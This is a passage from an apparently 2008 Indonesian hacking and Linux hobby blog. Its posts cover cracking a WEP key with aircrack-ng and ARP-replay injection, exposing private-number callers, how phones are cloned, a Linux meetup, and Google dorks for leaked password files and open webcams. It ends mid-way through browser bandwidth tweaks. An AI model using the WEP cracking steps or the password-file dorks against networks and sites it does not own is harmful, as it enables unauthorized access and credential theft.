are very new to linux, selecting text in the terminal window (with the mouse) will automatically copy it, and clicking both mouse buttons at the same time will paste. You can stop any aircrack programs with ctrl+c. To see the history of the terminal window, you can scroll with shift+pageUp/pageDown.<br /><br />BackTrack 2 supports ipw2200 injection out of the box, but there are some limitations. Injection is slightly more complex when using the ipw2200 as opposed to other cards - you have to use different interfaces to inject and monitor. You can only use the following aireplay-ng attacks with the ipw2200:<br /> 2 (--interactive)<br /> 3 (--arpreplay)<br /> 4 (--chopchop)<br /><br />You will need the following information first. You can find access point details using: "iwlist eth1 scan" after you log into BackTrack.:<br /> Access point bssid<br /> Access point channel<br /><br />==================<br /><br />0. (optional) The aircrack-ng team has done such a great job lately that there have been 2 releases since BackTrack 2. So the first thing that you should do is update aircrack-ng to v0.9. You should start backtrack connected to a LAN so that you can download the updates.<br /> wget http://download.aircrack-ng.org/aircrack-ng-0.9.tar.gz<br /> tar -zxvf aircrack-ng-0.9.tar.gz<br /> cd aircrack-ng-0.9<br /> make<br /> make install<br /><br />1. Enable the rtap0 interface.<br /> rmmod ipw2200<br /> modprobe ipw2200 rtap_iface=1<br /><br />2. Make a 'dummy' connection to the access point. You don't need to know the key at this stage - we just make up a fake one ("fakekey"). This step is required because of a limitation in the ipw2200 driver. ipw2200 must be in managed mode and connected to an access point before it will work with aireplay-ng.<br /> iwconfig eth1 ap <access><br /> iwconfig eth1 key s:fakekey<br /> iwconfig eth1 mode managed<br /><br />3. Bring up the interfaces:<br /> ifconfig eth1 up<br /> ifconfig rtap0 up<br /><br />3a. Optional: at this point, you can type "iwconfig" to see if the dummy connection from step 2 has worked. The connection details will be listed beside the "eth1" interface.<br /><br />4. Run airodump-ng to capture packets from your access point to dumpfile*.cap. You should always specify a channel with airodump, because otherwise it will try to scan through all channels, and that will break your injection attack.<br /> airodump-ng --channel <access> --bssid <access> -w dumpfile rtap0<br /><br />4a. After a few seconds in airodump-ng, you should notice that there are clients connected to the access point (they will be listed under "STATION"). Take note of the MAC address of one of the clients. You will use it in the next step.<br /><br />5. Open another terminal window. Run an ARP replay attack. Note the commands at the end of the line ("-i rtap0 eth1") which tell aireplay-ng to listen on rtap0 and inject on eth1. After some time, an ARP packet will come through and the #/s figure in the airodump-ng window will increase. If the RXQ (receive quality %) column is >90 then you should be getting #/s of 200 or higher, but more importantly, it should be much higher than what it was before.<br /> aireplay-ng --arpreplay -b <access> -h <client> -i rtap0 eth1<br /><br />6. Wait a few minutes until the #Data reaches 100 000 (if you updated in step 0), or 1 000 000 (if you did not update in step 0). This should be more than enough, but we leave the attack running just in case.<br /><br />7. Open another terminal window and run aircrack-ng.<br />If you did not update aircrack-ng in step 0, you will need 1 000 000 IVs, and will have to run aircrack-ng without -z:<br /> aircrack-ng -b <access> dumpfile*.cap<br />If you did update in step 0, you can use the PTW attack (-z option). Aircrack should say that it is processing approx. 100 000 IVs. If this number is low (less than 1000), there is some problem with your injection attack. Aircrack will then display "Key Found". You should know what to do after that.<br /> aircrack-ng -z -b <access> dumpfile*.cap<br /><br />You should now have the key.<br /><br />==================<br /><br /><br />Thanks that worked..<br /><br />However...my problem now is with<br /><br />aircrack-ng -z -b <access> dumpfile*.cap<br /><br />It doesn't allow option z<br />tells me it doesn't exist<br /><br />oh well...<br /><br />thanks for all the help!<br /><br />-k<br /><br />--------------<br /><br /><br />Hi,<br /><br />I think you still have some problems with these lines:<br /> modprobe ipw2200 rtap_iface= 2<br /> modprobe ipw rtap_iface= 1<br /><br />You only need the second line, and it looks like you have a space between = and 1. It should be like this:<br /> modprobe ipw2200 rtap_iface=1<br /><br />Also, you don't actually need these:<br /> cd /root<br /> cd /pentest/wireless/aircrack-ng<br />Aircrack-ng is in the path, so you don't need to be in that directory to run it. You can run it from anywhere.<br /><br /><br />See how you go with these commands.<br /><br /><br />------------------<br /><br />Yes, I think it will work if the authentication method of the AP is set to 'open' - step 2 actually authenticates with the AP, but any data that is sent/received would be scrambled because you have enetered the wrong key. With shared authentication, it would probably not work because you need the key before you can authenticate with the AP.<br /><br />The developers may be able to confirm if using the linux wireless tools is the same as using fake authentication against an open-authentication network.<br />Does anyone know if this:<br /> iwconfig ath0 bssid <ap><br /> iwconfig ath0 essid <ap><br /> iwconfig ath0 key s:fakekey<br />will achieve the same result as this:<br /> aireplay-ng --fakeauth 0 -e <ap> -a <ap> -h <ath0> ath0<br /><br />-----------------------<br /><br />Write &amp; take :<br />Yudhax</ath0></ap></ap></ap></ap></access></access></access></client></access></access></access></access><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-1719897460634072363?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com1tag:blogger.com,1999:blog-8559681578113508762.post-26373257661104263692008-04-08T04:09:00.003+07:002008-05-13T05:12:49.755+07:00<span style="font-family:courier new;">Sehubungan dengan banyaknya pertanyaan yang masuk baik di milis maupun melalui pesan pribadi, jadi alangkah baiknya jika saya berikan saja sedikit "tutorial" agar tidak terdapat pertanyaan yang berulang - ulang, khususnya dalam masalah ini yaitu bagaimana menampilkan nomer private number penelpon yang masuk ke kita.</span><br /><br /><span style="font-family:courier new;"> CARA PERTAMA:</span><br /><span style="font-family:courier new;"> Ketikkan kode *#30# dan tekan OK, maka di layar akan muncul tulisan " nomer penelpon ditampilkan" atau biasanya tergantung dari tipe hp masing - masing. Untuk kode ini sayangnya tidak didukung oleh operator di Indonesia, jadi ini hanya sebagai bahan pengetahuan saja. kapan yah di Indonesia operatornya bisa?</span><br /><br /><span style="font-family:courier new;"> CARA KEDUA</span><br /><span style="font-family:courier new;"> Mendivert semua panggilan tidak dikenal. Pada setiap hp ada fasilitas divert/ pengalihan ini, nah pada malam hari jika memaksa tetap mengaktifkan hp dan biasanya ada orang iseng gunakan fasilitas divert ini, caranya alihkan semua panggilan tidak dikenal (yang tidak tercantum di phonebook) ke kotak mailbox, jadi setiap panggilan masuk yang nomernya hidden bakalan masuk ke mailbox dan nanti kita akan mendapatkan sms bahwa pemanggil dengan nomer 08xxxxxxxx telah menghubungi anda. Lihat record dari nomer tersebut sapa saja yang menelpon. Khusus untuk Exelcom,Indosat dan Kartu Halo biasanya bisa.</span><br /><br /><span style="font-family:courier new;"> CARA KETIGA</span><br /><span style="font-family:courier new;"> Di saat anda tahu ada orang iseng dengan menelpon berulang - ulang menggunakan private number, sebaiknya setelah panggilan ketiga kalinya, matikan hp anda sampai beberapa waktu,tujuannya agar penelpon kena pulsa,hehehe. Maksudnya supaya dia masuk ke kotak mailbox juga, nah seperti cara kedua, maka saat kita menghidupkan hp kita nomer penelpon akan diberikan oleh operator kita. Misalnya jika kita menggunakan Exelcom, maka smsnya akan datang dari 818 dengan isi " anda telah dihubungi oleh 081xxxxxxx pada 23:15 dst...". Saya rasa ini adalah cara paling ampuh secara tradisional yang bisa diterapkan di Indonesia.</span><br /><br /><span style="font-family:courier new;"> CARA KEEMPAT</span><br /><span style="font-family:courier new;"> Saat anda tahu ada penelpon iseng dengan menggunakan private number, maka gunakan hp anda untuk menelpon, nah maka saat dia mencoba menelpon anda di tempat si penelpon iseng tersebut akan masuk ke mailbox karena nada sibuk. Untuk mengetahui nomernya si penelpon biasanya anda mendapatkan sms seperti yang saya jelaskan di cara ketiga di atas.</span><br /><br /><span style="font-family:courier new;"> CARA KELIMA</span><br /><span style="font-family:courier new;"> Reject telpon anda dengan menekan tombol bergambar telpon warna merah (tombol off) dan biarkan si penelpon masuk ke mailbox. Sayangnya cara ini tidak selalu bisa, karena dianggap kita sengaja menolak setelah mengetaui penelponnya, tapi untuk malam hari kebanyakan cara ini akan menggiring penelpon ke kotak mailbox kita sehingga sekali lagi kita akan mendapat sms seperti sebelumnya. </span><br /><br /><span style="font-family:courier new;"> Untuk pembuktian semua cara ini, silahkan lakukan sendiri terlebih dahulu untuk meyakinkan anda. Jadi anda bisa memilih cara mana yangs ekiranya lebih didukung oleh hp anda dan operatornya. Cara ini mungkin masih sederhana, tapi saya harap bisa membantu anda yang sering diterror oleh penelpon iseng. Silahkan rekan - rekan lain menambahkan jika memiliki cara dan pengalaman berbeda seperti di atas.<br /><br />bisa juga seperti ini:<br /></span>PAKE SONY ERRICson langsng bisa ketauan sapa yg call walaupun dia pake PRIVATE NUMBER kena LOGnya. kalo HP laen tulisannya "Private number" tapi kalo SOny tulisannya Witheld. nah pas udah ada call yg masuk lu langsng call balik ketauan deh nomornya yg tlp lu barusan. avecasd.tripod.com<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2637325766110426369?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com3tag:blogger.com,1999:blog-8559681578113508762.post-28360578875412771862008-04-07T12:40:00.001+07:002008-05-13T05:13:16.884+07:00Gue menemukan artikel bagus nih<br /><br />Banyaknya kasus pengggandaan HP yang berbuntut pada rekening pulsa telepon tiba–tiba naik membuat kita jadi takut.Begitu mudahnya orang menyadap frekuensi dan nomor pesawat kita ternyata.<br />Apalagi software untuk menggandakan atau juga “Cellular Software and Modification Guides” tersedia banyak baik di pasaran maupun di internet <img src="http://forum.man3malang.com/default/smiley.gif" alt="Smiley" border="0" /> <img src="http://forum.man3malang.com/default/smiley.gif" alt="Smiley" border="0" /> <img src="http://forum.man3malang.com/default/smiley.gif" alt="Smiley" border="0" />.Menurut info yang saya dapatkan si pengganda nomor telpon HP membeli HP “blank” dari luar kemudian di copy kan program dari HP asli, maksudnya untuk menghemat pulsa teleponnya dan si pengganda tidak melaporkan ke pihak penyelenggara jaringan cellular.Sebab klo dianya lapor maka bisa ketangkep <img src="http://forum.man3malang.com/default/smiley.gif" alt="Smiley" border="0" /> hehehe..hehe.<br /><br />Tanpa kita sadari proses penggandaan tsb, berakibat adanya kemungkinan data HP tsb disimpan atau malah memang sengaja disimpan oleh si pengganda lantas di copy kan ke HP blank lainnya dan kemudian muncullah HP kembarannya.Jika HP kembaran tidak resmi (clone) ini dipakai di Indonesia maka, penghitungan pulsanya ikut nomor asli-nya, yg berarti akan bertambah banyak diluar pemakaian HP asli dan kembaran yg dikehendaki sendiri oleh si pemilik.Bila kembarannya tidak resmi jumlahnya 2 atau 3 saja udah berapa tuh pertambahan rekening pulsanya .<br /><br />Cellular Software<br />Software ini hanya memerlukan input frekuensi yg dipakai utk transmisi dan definisi nomor telepon yg bakal digunakan.Perangkat yg diperlukan: PC biasa,Laptop atau komputer apa aja asal ada port komunikasi serial (COM1,COM2); Trus sebuah modul penulis program yg bisa dimasuki chip cellular telepon (HP) utk melakukan modifikasi sekaligus sbg pencetak “clone”HP tsb.Software tsb bisa didapatkan dari internet atau beli di dari luar negeri.(),tentu saja udah ada perangkatnya, mulai dari komputer, interface, analyzer bahkan softwarenya klo lo pade tertarik <img src="http://forum.man3malang.com/default/smiley.gif" alt="Smiley" border="0" />.<br /><br /><br /><br />RF ANALYZER<br />Penyadapan frekuensi pemancar penerima HP bisa menggunakan Rf Analyzer, dengan mempunyai kepekaan lumayan cermat, sehingga pada jarak 10 – 20 m sinyal dari HP dapat diterima dgn baik.Cara ini bisa memungkinkan untuk dilakukan bila HP sedang ON ditempat terbuka, dimana unit Rf Analyzer bisa menjangkau pada radius yg relatif aman, dan si pemilik HP asli tidak tahu jika sedang direkam frekuensinya.( wow…hehehe..).Beberapa merk Rf Analyzer sbb : TRIO, KIKUSUI, OPTOELCTRONICS, HIOKI, TENMA, HITACHI, LEADER, HYUNDAI, FLUKE, BK-PRECISION, PHILLIPS, dsb.<br /><br />DTMF DIGIT GRABBER<br />Selanjutnya dgn Voice Network Analyzer akan dipisahkan antara suara pembicara telepon dgn tone yg mewakili “nomor”nya, yaitu selisih waktu saat mencet nomor telepon (DTMF) dan saat sambungan diterima lawan bicara.Lewat bagian peralatan yg disebut sbg Digit Grabber akan ditampilkan sederet nomor telepon (DTMF) yg jadi incaran “si pengganda” untuk di copy kan ke HP yg masih “blank”, dan nantinya HP blank ini akan jadi “clone” dari HP aslinya.<br /><br />EPROM PROGRAMMER<br />Pengcopyan data frekuensi dan data HP hasil sadapan utk dimasukkan ke chip EPROM yg memang tersedia utk diprogram dlm HP, mudah dilakukan , yaitu dgn bantuan EPROM Writer/Programmer.sebuah card spesial utk urusan EPROM/EEPROM yg dimasukkan pada slot komputer dgn program khusus sudah dapat melakukan pengcopyan yg 100% sama persis dgn aslinya wow…hehehe..<br />(cuman klo lo ketangkep tanggung sendiri akibatnye ).<br /><br />GSM CELLULAR PHONE<br />Hal di atas tidak akan terjadi jika sistem cellular menggunakan “scramble” dan “descramble” yg dapat merahasiakan pembicaran.Cara ini banyak dipakai pada telekomunikasi militer / stasiun tv swasta (decoder) agar pelanggan mereka berhak menerima siarannya.Bahkan scramble dan descramble udah banyak di tawarkan bagi pemakai telepon rumah yg diparalel dgn wirelessphone, sebab jenis ini juga berpotensi utk digandakan .<br /><br />Saat sudah banyak HP yg menggunakan sistem GSM (Global System for Mobile), yaitu HP yg dilengkapi dengan SIM (Subscriber Identify Module), setara dgn Smart Card atau PCMCIA kartu sakti untuk komunikasi. SIM ini berupa “plug-in card” ukuran credit card dari bahan microchip yg mampu diisi program, data pemilik, datafax, videofacs dan billing system.Sistem transmisi GSM ini menggunakan scramble/descramble sehingga sulit di sadap/ditangkap, nomor DTMF ataupun informasi dalamnya.<br /><br />Tapi saya sendiri Percaya klo GSM bisa di ditangkap dan disadap karena yang namanya teknologi pasti mempunyai kelemahan karena yang menciptakan masih seorang manusia …heheeh..hahah.Sekian terima kasih maaf klo ada kesalahan dan kekurangan utk saran &amp; kritik bisa di kirim ke <a href="mailto:drponidi@phracker.org">drponidi@phracker.org</a>.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-2836057887541277186?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-31975380044470643722008-04-02T08:18:00.003+07:002008-05-13T05:13:54.022+07:00[ UNDANGAN TUK SEMUA ]<br /><br /><strong>PEKANBARU</strong> : Para linuxer yang berbahagia, dalam waktu dekat ini pengurus mencoba untuk mengumpulkan para linuxer dalam suatu konsep acara kumpul-kumpul yang diberi nama <strong>Kumpul-Kumpul Linuxer (KKL)</strong> dan sharing ilmu seputar permasalahan linux yang mengambil topik seperti tertera di bawah ini. Untuk itu, seluruh linuxer baik pengurus atau anggota diharapkan kehadiran dan partisipasi dalam acara tersebut. Acara ini juga bertujuan untuk mempererat tali silaturahmi antar sesama anggota, baik anggota yang sudah lama mendaftar maupun anggota yang baru bergabung.<div>Acara ini disponsori oleh Warung Internet (Warnet) Boom Net milik Mr. Dayat. Warnet tersebut dibawah asuhan KPLI-Pekanbaru, berlokasi di Jalan Balam Ujung No. 8 A, Sukajadi - <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_0">Pekanbaru</span> (dekat Jalan Ikhlas, bisa masuk dari Jalan Pembangunan) . Selain itu, juga akan dilakukan sosialisasi Program Kerja (Proker) KPLI-Pekanbaru Tahun 2008. Agenda ini berlaku untuk semua anggota dan pengurus untuk mempertegas arah dan besaran dari pelaksanaan eksistensi KPLI-Pekanbaru pada masa kerja tahun 2008. </div><div> Nama Kegiatan : <strong>Kumpul-Kumpul <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_1">Linux</span> (KKL) KPLI - <span style="border-bottom: 1px dashed rgb(0, 102, 204); background: transparent none repeat scroll 0% 50%; cursor: pointer; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" class="yshortcuts" id="lw_1207099053_2">Pekanbaru<br /> kalo menurut gw ditambah tema : MIGRASI WIDOWS ke LINUX<br /></span></strong></div><div> </div><div><u>Agenda Kegiatan<br /></u><strong>0. Distro LINUX <-------------------------- ini no.1</strong><br /></div><div><strong> 1. Pengenalan <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_3">Linux</span> Secara Umum <---- ini paling penting deh mnurut gw </strong></div><div><strong>2. Pembelajaran Instalasi <span style="border-bottom: 1px dashed rgb(0, 102, 204); background: transparent none repeat scroll 0% 50%; cursor: pointer; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" class="yshortcuts" id="lw_1207099053_4">Linux <------- ini juga boleh </span></strong></div><div><strong>3. Konfigurasi Jaringan <----------------- harusnya disini backoffice + multimedia </strong></div><div><strong>4. Konfigurasi Web Server <--------------- ini tntg aplikasi + games 5. System direktori linux <--------------- ini selanjutnya harusnya </strong></div><div><strong>6. Linux Driver <--------------------------- ini selanjutnya harusnya</strong><br /><strong>7. Migrasi Aplikasi Windows ke Linux <-- ini selanjutnya harusnya </strong></div><div><u> Tempat Dan Waktu</u></div><div>Hari/Tgl : Minggu, 6 April 2008</div><div>Waktu : Pukul 10:00 Sampai Selesai</div><div>Tempat : BOOM Net, Jl. Balam Ujung No. 8 A</div><div> Sukajadi - <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_5">Pekanbaru</span></div><div> </div><div><u>Kontak Person</u> </div><div>Dayat : 0761 - 7602606</div><div>Edison : 0761 - 7797338</div><div>Wira : 0761 - 7627327 </div><div> </div><div><strong>NB</strong> : Untuk Para linuxer yang mempunyai Distro maupun tutorial mengenai linux, diharapkan untuk dapat membawanya. dan untuk warnet-warnet di <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_6">Pekanbaru</span> yang mau mengundang KPLI - <span style="border-bottom: 1px dashed rgb(0, 102, 204); background: transparent none repeat scroll 0% 50%; cursor: pointer; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" class="yshortcuts" id="lw_1207099053_7">Pekanbaru</span> dalam Acara Komunitas <span style="border-bottom: 1px dashed rgb(0, 102, 204); cursor: pointer;" class="yshortcuts" id="lw_1207099053_8">Linux</span> dapat menghubungi sekretariat KPLI - <span style="border-bottom: 1px dashed rgb(0, 102, 204); background: transparent none repeat scroll 0% 50%; cursor: pointer; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" class="yshortcuts" id="lw_1207099053_9">Pekanbaru</span>. </div><br /><br />Sangat Senang rasanya ada wadah komunitas yang melakukan penerapan bidang open source,<br />dalam kancah sekarang ini open source yang telah dikembangkan, juga banyak menuai pasang surut. semua itu tak luput dari suatu komunity yang hanya berjalan sebagaimana layaknya saja, atau dengan kata lain tidak disosialisasikan secara menyeluruh dengan perasaan ikhlas dalam berbagi.<br /><br />Kalau Mr.Michael Sunggiardi pernah bilang " KESULITAN OPEN SOURCE DI INDONESIA DISEBABKAN TERBATASNYA ORANG YANG MAU BERBAGI ILMU ... " wehhhh ... itu sudah merupakan tamparan berat bagi para pengembang, cuma.. dalam kata lain terbesit banyak kebenaran yang terkandung didalamnya.. . Jujur saja, Problem itu memang bukan problem umum, cuma susahnya berbagi ilmu menjadikan opensource dlm komuniti bernafas dengan "1 lubang hidung"... susah bukan, berat bukan ..<br /><br />Oleh karena itu, mari kita semua yang ingin hidup bebas, nyaman, merdeka dan mempunyai jiwa tak keterikatan ... belajar untuk berbagi apa yang kita punya tentang open source...<br />saya yakin rejeki anda, kantong anda, kepintara anda tidak berkurang.<br /><br /><br />Yudhax<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-3197538004447064372?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-84278468273496905112008-03-22T08:41:00.002+07:002008-05-13T05:14:38.767+07:00<a style="font-family: arial;" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://airdump.net/cz/foo/images/blog_img/google.gif"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://airdump.net/cz/foo/images/blog_img/google.gif" alt="" border="0" /></a><span style="font-family:arial;"> I am sure you know the situation. When googling for a </span><strong style="font-family: arial;">technical text</strong><span style="font-family:arial;"> the search engine will put together a "great offer" of a book eshop or when looking for a specialized forum you will find an advert for holiday in Spain posted on the first place. Today is almost everyone a "SEO expert" (read fucker) and </span><strong style="font-family: arial;">define</strong><span style="font-family:arial;"> the desirable enquiry can be tricky. When the enquiry comes out well - you can be surprised by the result :) How to start? Just have a look at </span><a style="font-family: arial;" href="http://www.google.com/intl/en/help/refinesearch.html" rel="nofollow">Google Help Center</a><span style="font-family:arial;"> - Briefly: </span><strong style="font-family: arial;">Use operator</strong><span style="font-family:arial;"> or its combination. Theory.. and what about the reality?</span> <p style="font-family: arial;">First option is to spend your money on a clever book where you will learn that <strong>you will not read</strong> there anything that can not be found on internet.<br />Other option is to find a "place" where they know it and will "share it" :) - Or share their own specialized applications.</p> <p style="font-family: arial;">The last and best option is to know about projects that run super-structures for <strong>Google</strong> (yes even such places exist) and they directly generate the right search strings from the <strong>key word</strong>.</p> <p style="font-family: arial;">The power of searching (read information) can be demostrated on a simple example.. This shot of a tram accident is not yet in any (TV, radio, internet) news.</p><p style="font-family: arial;">--</p><span style="font-family:arial;">--</span><br /><span style="font-family:arial;"> Thanks to the search engine you know about it many hours in advance. Just know how and where to look for it.</span><br /><br /><br /><span style="font-family:arial;"> Few examples for more advanced Google searching (using).</span><br /><br /><br /><strong style="font-family: arial;">Filtering:</strong> <p style="font-family: arial;">Page AirDump.Net <strong>with out pictures</strong> and styling - <a href="http://www.google.com/gwt/n?u=http%3A%2F%2Fairdump.net%2F&amp;_gwt_noimg=1&amp;hl=cs&amp;mrestrict=xhtml" rel="nofollow">Filtred</a> version.</p> <p style="font-family: arial;"><strong>eBook:</strong></p> <p style="font-family: arial;">-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.txt|.lit|.doc|.rtf|.zip|.rar|.pdf|.chm) "hacking linux"</p> <p style="font-family: arial;"><strong>Music:</strong></p> <p style="font-family: arial;">-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma|.ogg) "buena vista"</p> <p style="font-family: arial;">intitle:"index.of" (mp3|mp4|avi) tricky -html -htm -php -asp -cf -jsp -e-mp3s.eu</p> <p style="font-family: arial;"><strong>Hesla:</strong></p> <p style="font-family: arial;">inurl:passlist.txt</p> <p style="font-family: arial;">inurl:password.txt</p> <p style="font-family: arial;">inurl:config.php</p> <p style="font-family: arial;"><strong>Video:</strong></p> <p style="font-family: arial;">-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mpg|.avi|.wmv|.di) "wep"</p> <p style="font-family: arial;"><strong>Live WebCam</strong></p> <p style="font-family: arial;">intitle:liveapplet inurl:LvAppl</p> <p style="font-family: arial;">"powered by webcamXP"</p> <p style="font-family: arial;"><strong>Serial Key, Licence:</strong></p> <p style="font-family: arial;">"computer profile summary" AND "licence" AND "key:" AND "vista"</p> <p style="font-family: arial;">--<br />Term in "..." and (...) can be randomly changed..</p> <p style="font-family: arial;">Useful operators:</p> <p style="font-family: arial;"><strong>site</strong> - searching on pages that contain .cz<span style="font-style: italic;"><br />Example: site:cz specification "802.11" (for example -cisco -something is filtering surplus of undesirable terms)</span></p> <p style="font-family: arial;"><strong>cache</strong> - searching in cache<br /><strong>intitle</strong> - searches in title<br /><strong>filetype</strong> - searching of a concrete file type<br /><strong>inurl</strong> - searching of a term included in url<br /><strong>allintext</strong> - searches text on a concrete page</p> <p style="font-family: arial;">The virtual space is overfulled with interesting things.. and a description even of the smallest one would cover a lot of pages.</p> <p style="font-family: arial;"><strong>Utils</strong> at the end: <a href="http://www.googlefight.com/" rel="nofollow">Google Fight</a> compares the number of using (for example one of two similar) of what ever word in the net. </p> <p style="font-family: arial;"><strong>Database</strong> web cameras connectable (configurable) from the internet you will find on pages <a href="http://www.opentopia.com/hiddencam.php" rel="nofollow">Opentopia</a>.</p> <p style="font-family: arial;">Other <strong>reading</strong> about <a href="http://www.google.com/search?hl=en&amp;ie=ISO-8859-1&amp;safe=off&amp;q=-inurl%3Ahtm+-inurl%3Ahtml+intitle%3A%22index+of%22+%2B%28%22%2Febooks%22%7C%22%2Fbook%22%29+%2B%28chm%7Cpdf%7Czip%29+%2B%22google+hacks%22+%22Last+Modified%22+-oreilly&amp;btnG=Search" rel="nofollow">Hacking Google</a> :)</p> <p style="font-family: arial;">Useful <a href="http://www.google.com/search?hl=en&amp;safe=off&amp;q=google+hack+filetype%3Apdf&amp;btnG=Search" rel="nofollow">links</a> and few of <a href="http://www.mininova.org/search/google+hack/2" rel="nofollow">torrents</a> at the close.</p><br /><p style="font-family: arial;"><br /></p><p style="font-family: arial;"><br /></p><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-8427846827349690511?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-44385173908540479872008-03-22T07:13:00.005+07:002008-05-13T05:15:20.290+07:00<span style="font-family:arial;">Apakah anda pernah bermasalah dengan tragedi tarik-menarik Bandwith antar computer jaringan internet?? weww.. pasti pernah..<br /><br />Misal Warnet… itu karena tiap bilik/room sudah di batasi bitrate n bandwithnya…<br />Mungkin Ini bisa jadi Solusi:<br /><br />1). Buka Browser Mozilla Firefox</span><br /><span style="font-family:arial;">2). Pada Address Bar Ketik : <span style="font-weight: bold;">about:CONFIG</span></span><br /><span style="font-family:arial;">3). Cari string di bawah ini : ( <span style="font-weight: bold;">pastikan semua srting dibawah“TRUE”</span>)<br /><br /></span><span style="font-family:arial;">contoh menggantingnya :<br /><span style="font-weight: bold;">NETWORK.HTTP.PIPELINING FALSE</span> ==> klik kanan dan pilih</span><br /><br /><span style="font-weight: bold;font-family:arial;" >“Toggle” NETWORK.HTTP.PIPELINING TRUE</span><br /><br /><span style="font-weight: bold;font-family:arial;" >NETWORK.HTTP.PIPELINING.MAXREQUESTS 64</span><br /><br /><span style="font-weight: bold;font-family:arial;" >NETWORK.HTTP.PROXY.PIPELINING TRUE</span><br /><br /><span style="font-family:arial;"><span style="font-weight: bold;">NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <span style="font-style: italic;"><=== ini harus False</span></span></span><br /><br /><span style="font-family:arial;">4). Buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan [/b]<span style="font-weight: bold;">NEW</span>>><span style="font-weight: bold;">INTEGER</span>[/b]</span><br /><br /><span style="font-family:arial;">5). Ketik : <span style="font-weight: bold;">NGLAYOUT.INITIALPAINT.DELAY</span> Beri Nilai <span style="font-weight: bold;">0</span></span><br /><br /><span style="font-family:arial;">6). Kemudian <span style="font-weight: bold;">REFRESH </span>atau Tekan <span style="font-weight: bold;">F5</span></span><br /><br /><span style="font-family:arial;">7). Pada Address Bar Ketik : <span style="font-weight: bold;">about:BLANK</span></span><br /><br /><span style="font-family:arial;">Klik Menu:</span><br /><span style="font-family:arial;">Untuk <span style="font-weight: bold;">OS Windows</span> XP <span style="font-weight: bold;">TOOLS</span>>><span style="font-weight: bold;">OPTIONS</span>>><span style="font-weight: bold;">WEB FEATURES </span></span><br /><br /><span style="font-family:arial;">Untuk <span style="font-weight: bold;">OS Linux</span> <span style="font-weight: bold;">EDIT</span> >> <span style="font-weight: bold;">PREFERENCES</span> Untuk Setting yang berbeda di beberapa <span style="font-weight: bold;">OS EDIT >>ADVANCED</span></span><br /><br /><span style="font-family:arial;">9). Pada Option :<br /><span style="font-weight: bold;">ALLOW WEB SITES TO INSTALL SOFTWARE </span>Beri Tanda <span style="font-weight: bold;">Check Box</span> Untuk mengaktifkan</span><br /><br /><span style="font-family:arial;">10).Kemudian Tekan <span style="font-weight: bold;">OK</span> Lalu <span style="font-weight: bold;">REFRESH </span>(<span style="font-weight: bold;"> F5 </span>)</span><br /><br /><span style="font-family:arial;">11).Masuk Ke <span style="font-weight: bold;">Link Ini </span>:<br />Code: <span style="font-weight: bold;">https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&amp;id=125</span></span><br /><span style="font-family:arial;">atau :<br />Code: <span style="font-weight: bold;">https://addons.mozilla.org/extensions/moreinfo.php?id=125&amp;applicationfiltered=firefox</span></span><br /><br /><span style="font-family:arial;">12).<span style="font-weight: bold;">Download</span> Software <span style="font-weight: bold;">SwitchProxy Tool Versi 1.3.4</span><br />Code:</span><br /><span style="font-family:arial;"><span style="font-weight: bold;">https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&amp;id=125</span> atau Disini<br />Code:</span><br /><span style="font-family:arial;"><span style="font-weight: bold;">https://addons.mozilla.org/extensions/moreinfo.php?id=125&amp;applicationfiltered=firefox 13)</span>.<br /><br />Setelah Selesai Jangan Tekan Tombol <span style="font-weight: bold;">UPDATE</span></span><br /><br /><span style="font-family:arial;">14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul</span><br /><br /><span style="font-family:arial;">15).Tutup Semua Browser Mozilla FireFox,</span><br /><br /><span style="font-family:arial;">16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi</span><br /><br /><span style="font-family:arial;">17).Kalo Instalasi Sukses, Akan Muncul Toolbar 